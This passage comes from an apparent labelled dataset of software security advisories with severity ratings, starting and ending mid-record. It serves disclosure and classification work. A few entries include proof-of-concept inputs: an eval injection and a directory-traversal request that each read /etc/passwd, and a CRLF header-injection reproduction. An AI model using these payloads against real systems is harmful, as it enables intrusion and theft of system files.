Impact\n\nNew user registrations are able to access anyone's account by only knowing their basic profile information (name, birthday, gender, etc). This includes all app functionality within the app, as well as any authenticated links to Rock-based webpages (such as giving and events).\n\n### Patches\n\nWe have released a security patch on v2.20.0. The solution was to create a duplicate person and then patch the new person with their profile details.\n\n### Workarounds\n\nIf you do not wish to upgrade your app to the new version, you can patch your server by overriding the `create` data source method on the `People` class.\n\n```js\n create = async (profile) => {\n const rockUpdateFields = this.mapApollosFieldsToRock(profile);\n // auto-merge functionality is compromised\n // we are creating a new user and patching them with profile details\n const id = await this.post('/People', {\n Gender: 0, // required by Rock. Listed first so it can be overridden.\n IsSystem: false, // required by rock\n });\n await this.patch(`/People/${id}`, {\n ...rockUpdateFields,\n });\n return id;\n };\n```\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [support@apollos.app](mailto:support@apollos.app)", "text_raw": "Auto-merging Person Records Compromised\n\n[Severity: HIGH]\n\n### Impact\n\nNew user registrations are able to access anyone's account by only knowing their basic profile information (name, birthday, gender, etc). This includes all app functionality within the app, as well as any authenticated links to Rock-based webpages (such as giving and events).\n\n### Patches\n\nWe have released a security patch on v2.20.0. The solution was to create a duplicate person and then patch the new person with their profile details.\n\n### Workarounds\n\nIf you do not wish to upgrade your app to the new version, you can patch your server by overriding the `create` data source method on the `People` class.\n\n```js\n create = async (profile) => {\n const rockUpdateFields = this.mapApollosFieldsToRock(profile);\n // auto-merge functionality is compromised\n // we are creating a new user and patching them with profile details\n const id = await this.post('/People', {\n Gender: 0, // required by Rock. Listed first so it can be overridden.\n IsSystem: false, // required by rock\n });\n await this.patch(`/People/${id}`, {\n ...rockUpdateFields,\n });\n return id;\n };\n```\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [support@apollos.app](mailto:support@apollos.app)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-21", "split": "train"} -{"id": "e6cfc64e3e5b7c51682d", "text": "Malicious Package in ladder-text-js\n\n`ladder-text-js` contained a malicious script that attempted to delete all files when `npm test` was run.\n\n## Recommendation\n\nThis module has been unpublished from the npm Registry. If you find this module in your environment remove it.", "text_raw": "Malicious Package in ladder-text-js\n\n[Severity: CRITICAL]\n\n`ladder-text-js` contained a malicious script that attempted to delete all files when `npm test` was run.\n\n\n\n## Recommendation\n\nThis module has been unpublished from the npm Registry. If you find this module in your environment remove it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "f92fca87f5f0d40fccdf", "text": "Unaligned references in Obstack\n\nObstack generates unaligned references for types that require a large alignment.", "text_raw": "Unaligned references in Obstack\n\n[Severity: HIGH]\n\nObstack generates unaligned references for types that require a large alignment.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "cb144fa7559fc0ad8d45", "text": "Microsoft Windows CryptoAPI Spoofing Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows CryptoAPI (Crypt32.dll) contains a spoofing vulnerability in the way it validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The vulnerability is also known under the moniker of CurveBall.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-295\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Windows CryptoAPI Spoofing Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows CryptoAPI (Crypt32.dll) contains a spoofing vulnerability in the way it validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The vulnerability is also known under the moniker of CurveBall.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-295\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "0554f47fbe2d3bb004a4", "text": "Malicious npm package: sonatype\n\nThe npm `sonatype` package has been identified as malicious and removed from the npm package registry.\n\n## Remediation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious npm package: sonatype\n\n[Severity: CRITICAL]\n\nThe npm `sonatype` package has been identified as malicious and removed from the npm package registry.\n\n## Remediation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-01-29", "split": "train"} -{"id": "dafce350f20aaae442c5", "text": "Improper Validation of Certificate with Host Mismatch in Java-WebSocket\n\nThe Java-WebSocket Client does not perform hostname verification.\n\n- This means that SSL certificates of other hosts are accepted as long as they are trusted. To exploit this vulnerability an attacker has to perform a man-in-the-middle (MITM) attack between a Java application using the Java-WebSocket Client and an WebSocket server it's connecting to.\n - TLS normally protects users and systems against MITM attacks, it cannot if certificates from other trusted hosts are accepted by the client.\n\nFor more information see: CWE-297: Improper Validation of Certificate with Host Mismatch - https://cwe.mitre.org/data/definitions/297.html\n\n## Important note\n\nThe OWASP Dependency-Check (https://jeremylong.github.io/DependencyCheck/index.html) may report that a dependency of your project is affected by this security vulnerability, but you don't use this lib.\nThis is caused by the fuzzy search in the OWASP implementation.\nCheck out this issue (https://github.com/TooTallNate/Java-WebSocket/issues/1019#issuecomment-628507934) for more information and a way to suppress the warning.", "text_raw": "Improper Validation of Certificate with Host Mismatch in Java-WebSocket\n\n[Severity: HIGH]\n\nThe Java-WebSocket Client does not perform hostname verification.\n\n - This means that SSL certificates of other hosts are accepted as long as they are trusted. To exploit this vulnerability an attacker has to perform a man-in-the-middle (MITM) attack between a Java application using the Java-WebSocket Client and an WebSocket server it's connecting to.\n - TLS normally protects users and systems against MITM attacks, it cannot if certificates from other trusted hosts are accepted by the client.\n\nFor more information see: CWE-297: Improper Validation of Certificate with Host Mismatch - https://cwe.mitre.org/data/definitions/297.html\n\n## Important note\n\nThe OWASP Dependency-Check (https://jeremylong.github.io/DependencyCheck/index.html) may report that a dependency of your project is affected by this security vulnerability, but you don't use this lib.\nThis is caused by the fuzzy search in the OWASP implementation.\nCheck out this issue (https://github.com/TooTallNate/Java-WebSocket/issues/1019#issuecomment-628507934) for more information and a way to suppress the warning.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-05-08", "split": "train"} -{"id": "cdd391fbadc99052f55f", "text": "Arbitrary Code Injection in reduce-css-calc\n\nAffected versions of `reduce-css-calc` pass input directly to `eval`. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.\n\n## Proof of Concept\n\n```\nconst reduceCSSCalc = require('reduce-css-calc');\nconsole.log(reduceCSSCalc(`calc( (Buffer(10000)))`));\nconsole.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));\nconsole.log(reduceCSSCalc(`calc( (fs['readFileSync'](\"/etc/passwd\", \"utf-8\")))`));\n```\n\n## Recommendation\n\nUpdate to version 1.2.5 or later.", "text_raw": "Arbitrary Code Injection in reduce-css-calc\n\n[Severity: CRITICAL]\n\nAffected versions of `reduce-css-calc` pass input directly to `eval`. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.\n\n## Proof of Concept\n\n```\nconst reduceCSSCalc = require('reduce-css-calc');\nconsole.log(reduceCSSCalc(`calc( (Buffer(10000)))`));\nconsole.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));\nconsole.log(reduceCSSCalc(`calc( (fs['readFileSync'](\"/etc/passwd\", \"utf-8\")))`));\n```\n\n\n\n## Recommendation\n\nUpdate to version 1.2.5 or later.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-06-07", "split": "train"} -{"id": "4eb361210324496f82d8", "text": "An issue was discovered in Mayan EDMS before 3.0.2. The Cabinets app has XSS via a crafted cabinet label.", "text_raw": "Moderate severity vulnerability that affects mayan-edms\n\n[Severity: MEDIUM]\n\nAn issue was discovered in Mayan EDMS before 3.0.2. The Cabinets app has XSS via a crafted cabinet label.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-09-06", "split": "train"} -{"id": "b8f3ce03da593beaf07d", "text": "## Duplicate advisory\nThis advisory has been withdrawn because it is a duplicate of [GHSA-543v-gj2c-r3ch](https://github.com/advisories/GHSA-543v-gj2c-r3ch). This link is maintained to preserve external references.\n\n## Original Description\nActive Model in Ruby on Rails 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 supports the use of instance-level writers for class accessors, which allows remote attackers to bypass intended validation steps via crafted parameters.", "text_raw": "Duplicate Advisory: Moderate severity vulnerability that affects activemodel\n\n[Severity: MEDIUM]\n\n## Duplicate advisory\nThis advisory has been withdrawn because it is a duplicate of [GHSA-543v-gj2c-r3ch](https://github.com/advisories/GHSA-543v-gj2c-r3ch). This link is maintained to preserve external references.\n\n## Original Description\nActive Model in Ruby on Rails 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 supports the use of instance-level writers for class accessors, which allows remote attackers to bypass intended validation steps via crafted parameters.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-09-17", "split": "train"} -{"id": "c7c26e825d264c59d2a1", "text": "Remote Command Execution in reg-keygen-git-hash-plugin\n\n### Impact\n\n`reg-keygen-git-hash-plugin` through 0.10.15 allow remote attackers to execute of arbitrary commands.\n\n### Patches\n\nUpgrade to version 0.10.16 or later.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n- Open an issue in [reg-viz/reg-suit](https://github.com/reg-viz/reg-suit)", "text_raw": "Remote Command Execution in reg-keygen-git-hash-plugin\n\n[Severity: HIGH]\n\n### Impact\n\n`reg-keygen-git-hash-plugin` through 0.10.15 allow remote attackers to execute of arbitrary commands.\n\n### Patches\n\nUpgrade to version 0.10.16 or later.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n- Open an issue in [reg-viz/reg-suit](https://github.com/reg-viz/reg-suit)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-08", "split": "train"} -{"id": "32a9c052bae54fbfa330", "text": "SQL injection in jackalope/jackalope-doctrine-dbal\n\n### Impact\n\nUsers can provoke SQL injections if they can specify a node name or query.\n\n### Patches\n\nUpgrade to version 1.7.4\n\nIf that is not possible, you can escape all places where `$property` is used to filter `sv:name` in the class `Jackalope\\Transport\\DoctrineDBAL\\Query\\QOMWalker`: `XPath::escape($property)`.\n\n### Workarounds\n\nNode names and xpaths can contain `\"` or `;` according to the JCR specification. The jackalope component that translates the query object model into doctrine dbal queries does not properly escape the names and paths, so that a accordingly crafted node name can lead to an SQL injection.\n\nIf queries are never done from user input, or if you validate the user input to not contain `;`, you are not affected.\n\n### References\n\nNo further references.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [jackalope/jackalope-doctrine-dbal repo](https://github.com/jackalope/jackalope-doctrine-dbal/issues)", "text_raw": "SQL injection in jackalope/jackalope-doctrine-dbal\n\n[Severity: HIGH]\n\n### Impact\n\nUsers can provoke SQL injections if they can specify a node name or query.\n\n### Patches\n\nUpgrade to version 1.7.4\n\nIf that is not possible, you can escape all places where `$property` is used to filter `sv:name` in the class `Jackalope\\Transport\\DoctrineDBAL\\Query\\QOMWalker`: `XPath::escape($property)`.\n\n### Workarounds\n\nNode names and xpaths can contain `\"` or `;` according to the JCR specification. The jackalope component that translates the query object model into doctrine dbal queries does not properly escape the names and paths, so that a accordingly crafted node name can lead to an SQL injection.\n\nIf queries are never done from user input, or if you validate the user input to not contain `;`, you are not affected. \n\n### References\n\nNo further references.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [jackalope/jackalope-doctrine-dbal repo](https://github.com/jackalope/jackalope-doctrine-dbal/issues)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-14", "split": "train"} -{"id": "0a43d92005d5238276ec", "text": "Segfault due to negative splits in `SplitV`\n\n### Impact\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/split_v_op.cc#L49-L205) of `SplitV` can trigger a segfault is an attacker supplies negative arguments:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.SplitV(\n value=tf.constant([]),\n size_splits=[-1, -2]\n ,axis=0,\n num_split=2)\n```\n\nThis occurs whenever `size_splits` contains more than one value and at least one value is negative.\n\n### Patches \nWe have patched the issue in GitHub commit [25d622ffc432acc736b14ca3904177579e733cc6](https://github.com/tensorflow/tensorflow/commit/25d622ffc432acc736b14ca3904177579e733cc6).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Segfault due to negative splits in `SplitV`\n\n[Severity: MEDIUM]\n\n### Impact\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/split_v_op.cc#L49-L205) of `SplitV` can trigger a segfault is an attacker supplies negative arguments:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.SplitV(\n value=tf.constant([]),\n size_splits=[-1, -2]\n ,axis=0,\n num_split=2)\n``` \n \nThis occurs whenever `size_splits` contains more than one value and at least one value is negative.\n \n### Patches \nWe have patched the issue in GitHub commit [25d622ffc432acc736b14ca3904177579e733cc6](https://github.com/tensorflow/tensorflow/commit/25d622ffc432acc736b14ca3904177579e733cc6).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-10", "split": "train"} -{"id": "192704a49ab7c870c9b3", "text": "Uncontrolled recursion in rust-yaml\n\nAffected versions of this crate did not prevent deep recursion while deserializing data structures. This allows an attacker to make a YAML file with deeply nested structures that causes an abort while deserializing it. The flaw was corrected by checking the recursion depth.", "text_raw": "Uncontrolled recursion in rust-yaml\n\n[Severity: HIGH]\n\nAffected versions of this crate did not prevent deep recursion while deserializing data structures. This allows an attacker to make a YAML file with deeply nested structures that causes an abort while deserializing it. The flaw was corrected by checking the recursion depth.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "ce5380c9051b96166543", "text": "Cross-site scripting in Apache JSPWiki\n\nOn Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the WYSIWYG editor, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.", "text_raw": "Cross-site scripting in Apache JSPWiki\n\n[Severity: MEDIUM]\n\nOn Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the WYSIWYG editor, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-10-11", "split": "train"} -{"id": "b8683f39aed737d55749", "text": "Inappropriate implementation in V8 in CefSharp\n\nHigh CVE-2020-16013: Inappropriate implementation in V8.\n\n- https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_11.html\n- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16013\n\nGoogle is aware of reports that exploits for CVE-2020-16013 and CVE-2020-16017 exist in the wild.", "text_raw": "Inappropriate implementation in V8 in CefSharp\n\n[Severity: HIGH]\n\nHigh CVE-2020-16013: Inappropriate implementation in V8. \n\n- https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_11.html\n- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16013\n\nGoogle is aware of reports that exploits for CVE-2020-16013 and CVE-2020-16017 exist in the wild.\n\nThere is currently little to no public information on the issue other than it has been flagged as `High` severity.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-11-27", "split": "train"} -{"id": "22dc4dbc45ca1fad62ed", "text": "Context isolation bypass via contextBridge in Electron\n\n### Impact\nApps using both `contextIsolation` and `contextBridge` are affected.\n\nThis is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.\n\n### Workarounds\nThere are no app-side workarounds, you must update your Electron version to be protected.\n\n### Fixed Versions\n* `9.0.0-beta.21`\n* `8.2.4`\n* `7.2.4`\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [security@electronjs.org](mailto:security@electronjs.org)", "text_raw": "Context isolation bypass via contextBridge in Electron\n\n[Severity: HIGH]\n\n### Impact\nApps using both `contextIsolation` and `contextBridge` are affected.\n\nThis is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.\n\n### Workarounds\nThere are no app-side workarounds, you must update your Electron version to be protected.\n\n### Fixed Versions\n* `9.0.0-beta.21`\n* `8.2.4`\n* `7.2.4`\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [security@electronjs.org](mailto:security@electronjs.org)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-07-07", "split": "train"} -{"id": "426bde8eead4abcdd988", "text": "Malicious Package in jw-sha3\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in jw-sha3\n\n[Severity: CRITICAL]\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "e5d0604a84b75911af72", "text": "Directory Traversal in welcomyzt\n\n`welcomyzt` is a simple file server.\n\n`welcomyzt` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing `../` in the url.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost: localhost\n```\n and server Response:\n```http\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in welcomyzt\n\n[Severity: HIGH]\n\n`welcomyzt` is a simple file server.\n\n`welcomyzt` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing `../` in the url.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost: localhost\n```\n and server Response:\n```http\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "3d96bc95f81732520abc", "text": "CRLF vulnerability in Fiber\n\n### Impact\nThe filename that is given in [c.Attachment()](https://docs.gofiber.io/ctx#attachment) is not escaped, and therefore vulnerable for a CRLF injection attack. I.e. an attacker could upload a custom filename and then give the link to the victim. With this filename, the attacker can change the name of the downloaded file, redirect to another site, change the authorization header, etc.\n\n### Steps to reproduce\n```go\npackage main\n\nimport \"github.com/gofiber/fiber\"\n\nconst badFileName = \"another secret document.pdf\\\"\\r\\nLocation: google.com\\r\\nAuthorization: \\\"example_of_session_fixation\"\n\nfunc splitTheResponse(c *fiber.Ctx) {\n\tc.Attachment(badFileName)\n}\n\nfunc main() {\n\tapp := fiber.New()\n\tapp.Get(\"/attack\", splitTheResponse)\n\tapp.Listen(\"127.0.0.1:8080\")\n}\n```\n```\nHTTP/1.1 200 OK\nDate: Fri, 10 Jul 2020 19:47:04 GMT\nContent-Type: application/octet-stream\nContent-Length: 0\nContent-Disposition: attachment; filename=\"another secret document.pdf\"\nLocation: google.com\nAuthorization: \"example_of_session_fixation\"\n```\n\n### Patches\nThis issue has been patched in `v1.12.6` with commit [579](https://github.com/gofiber/fiber/pull/579/commits/f698b5d5066cfe594102ae252cd58a1fe57cf56f) escaping the filename by default.\n\n### Workarounds\nYou could of course serialize the input yourself before passing it to `ctx.Attachment()`, this is actually a good practice by default. But in case you forget, we got you covered ����\n\n### References\nA CRLF injection attack is one of several types of injection attacks. It can be used to escalate to more malicious attacks such as Cross-site Scripting (XSS), page injection, web cache poisoning, cache-based defacement, and more. A CRLF injection vulnerability exists if an attacker can inject the CRLF characters into a web application, for example using a user input form or an HTTP request, [see acunetix](https://www.acunetix.com/websitesecurity/crlf-injection/)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [gofiber/fiber](https://github.com/gofiber/fiber)\n* Join us on [Discord](https://gofiber.io/discord)", "text_raw": "CRLF vulnerability in Fiber\n\n[Severity: MEDIUM]\n\n### Impact\nThe filename that is given in [c.Attachment()](https://docs.gofiber.io/ctx#attachment) is not escaped, and therefore vulnerable for a CRLF injection attack. I.e. an attacker could upload a custom filename and then give the link to the victim. With this filename, the attacker can change the name of the downloaded file, redirect to another site, change the authorization header, etc.\n\n### Steps to reproduce\n```go\npackage main\n\nimport \"github.com/gofiber/fiber\"\n\nconst badFileName = \"another secret document.pdf\\\"\\r\\nLocation: google.com\\r\\nAuthorization: \\\"example_of_session_fixation\"\n\nfunc splitTheResponse(c *fiber.Ctx) {\n\tc.Attachment(badFileName)\n}\n\nfunc main() {\n\tapp := fiber.New()\n\tapp.Get(\"/attack\", splitTheResponse)\n\tapp.Listen(\"127.0.0.1:8080\")\n}\n```\n```\nHTTP/1.1 200 OK\nDate: Fri, 10 Jul 2020 19:47:04 GMT\nContent-Type: application/octet-stream\nContent-Length: 0\nContent-Disposition: attachment; filename=\"another secret document.pdf\"\nLocation: google.com\nAuthorization: \"example_of_session_fixation\"\n```\n\n### Patches\nThis issue has been patched in `v1.12.6` with commit [579](https://github.com/gofiber/fiber/pull/579/commits/f698b5d5066cfe594102ae252cd58a1fe57cf56f) escaping the filename by default.\n\n### Workarounds\nYou could of course serialize the input yourself before passing it to `ctx.Attachment()`, this is actually a good practice by default. But in case you forget, we got you covered 👍 \n\n### References\nA CRLF injection attack is one of several types of injection attacks. It can be used to escalate to more malicious attacks such as Cross-site Scripting (XSS), page injection, web cache poisoning, cache-based defacement, and more. A CRLF injection vulnerability exists if an attacker can inject the CRLF characters into a web application, for example using a user input form or an HTTP request, [see acunetix](https://www.acunetix.com/websitesecurity/crlf-injection/)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [gofiber/fiber](https://github.com/gofiber/fiber)\n* Join us on [Discord](https://gofiber.io/discord)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-29", "split": "train"} -{"id": "77d8c5a9657f3cfdd802", "text": "Format string vulnerabilities in pancurses\n\nAn issue was discovered in the pancurses crate through 0.16.1 for Rust. printw and mvprintw have format string vulnerabilities.", "text_raw": "Format string vulnerabilities in pancurses\n\n[Severity: HIGH]\n\nAn issue was discovered in the pancurses crate through 0.16.1 for Rust. printw and mvprintw have format string vulnerabilities.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "1332247734e2282f03ce", "text": "Directory Traversal in bitty\n\nAffected versions of `bitty` are vulnerable to directory traversal via the URL path in GET requests.\n\n## Recommendation\n\nThe `bitty` package is not currently maintained, and has not seen an update since 2015.\n\nAt this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality, such as [serve](https://www.npmjs.com/package/serve).", "text_raw": "Directory Traversal in bitty\n\n[Severity: MEDIUM]\n\nAffected versions of `bitty` are vulnerable to directory traversal via the URL path in GET requests.\n\n\n## Recommendation\n\nThe `bitty` package is not currently maintained, and has not seen an update since 2015. \n\nAt this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality, such as [serve](https://www.npmjs.com/package/serve).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "7175e02b66930e4a29e3", "text": "Improper Authentication in Apache Shiro\n\nApache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management. Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.", "text_raw": "Improper Authentication in Apache Shiro\n\n[Severity: CRITICAL]\n\nApache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management. Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-07", "split": "train"} -{"id": "45c9e2e01b00d8b3c26d", "text": "Apple Multiple Products Code Execution Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, watchOS, and tvOS contain an unspecified vulnerability that may allow an application to execute code with kernel privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-415\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Apple Multiple Products Code Execution Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, watchOS, and tvOS contain an unspecified vulnerability that may allow an application to execute code with kernel privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-415\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "d9b79a4fb397e8f3bc7c", "text": "Exposure of Resource to Wrong Sphere in valib\n\nvalib through 2.0.0 allows Internal Property Tampering. A maliciously crafted JavaScript object can bypass several inspection functions provided by valib. Valib uses a built-in function (hasOwnProperty) from the unsafe user-input to examine an object. It is possible for a crafted payload to overwrite this function to manipulate the inspection results to bypass security checks.", "text_raw": "Exposure of Resource to Wrong Sphere in valib\n\n[Severity: MEDIUM]\n\nvalib through 2.0.0 allows Internal Property Tampering. A maliciously crafted JavaScript object can bypass several inspection functions provided by valib. Valib uses a built-in function (hasOwnProperty) from the unsafe user-input to examine an object. It is possible for a crafted payload to overwrite this function to manipulate the inspection results to bypass security checks.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-04-13", "split": "train"} -{"id": "4f958a1e6a8f7886ba74", "text": "Code Injection in md-to-pdf.\n\nThe package md-to-pdf before 5.0.0 are vulnerable to Remote Code Execution (RCE) due to utilizing the library gray-matter to parse front matter content, without disabling the JS engine.", "text_raw": "Code Injection in md-to-pdf.\n\n[Severity: CRITICAL]\n\nThe package md-to-pdf before 5.0.0 are vulnerable to Remote Code Execution (RCE) due to utilizing the library gray-matter to parse front matter content, without disabling the JS engine.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-12-16", "split": "train"} -{"id": "9dcc8ffe0c8189befefe", "text": "Regular Expression Denial of Service in Leo Editor\n\nLeo Editor v6.2.1 was discovered to contain a regular expression denial of service (ReDoS) vulnerability in the component plugins/importers/dart.py.", "text_raw": "Regular Expression Denial of Service in Leo Editor\n\n[Severity: HIGH]\n\nLeo Editor v6.2.1 was discovered to contain a regular expression denial of service (ReDoS) vulnerability in the component plugins/importers/dart.py.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-23", "split": "train"} -{"id": "a409f5f0ea9a6b70de99", "text": "DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness", "text_raw": "DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2017-08-09", "split": "train"} -{"id": "bf7bc6e759ad8a5b2070", "text": "RFD attack via Content-Disposition header sourced from request input by Spring MVC or Spring WebFlux Application\n\nIn Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a \"Content-Disposition\" header in the response where the filename attribute is derived from user supplied input.", "text_raw": "RFD attack via Content-Disposition header sourced from request input by Spring MVC or Spring WebFlux Application\n\n[Severity: HIGH]\n\nIn Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download 